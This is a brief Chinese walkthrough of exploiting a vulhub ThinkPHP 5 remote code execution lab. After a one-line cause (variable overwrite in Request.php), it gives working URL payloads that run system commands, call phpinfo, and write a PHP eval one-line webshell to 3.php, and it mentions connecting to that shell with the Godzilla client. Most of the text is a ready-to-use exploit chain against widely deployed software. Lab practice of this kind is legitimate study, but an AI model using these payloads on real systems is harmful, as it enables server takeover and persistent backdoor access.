一.环境配置
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
访问靶场:

漏洞利用:
漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题
远程命令执行:
POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami
执行完如下图

远程代码执行:
POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
如下图

写入一句话木马:
POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>">>3.php
然后去访问我们的3.php 创建成功

哥斯拉连接:

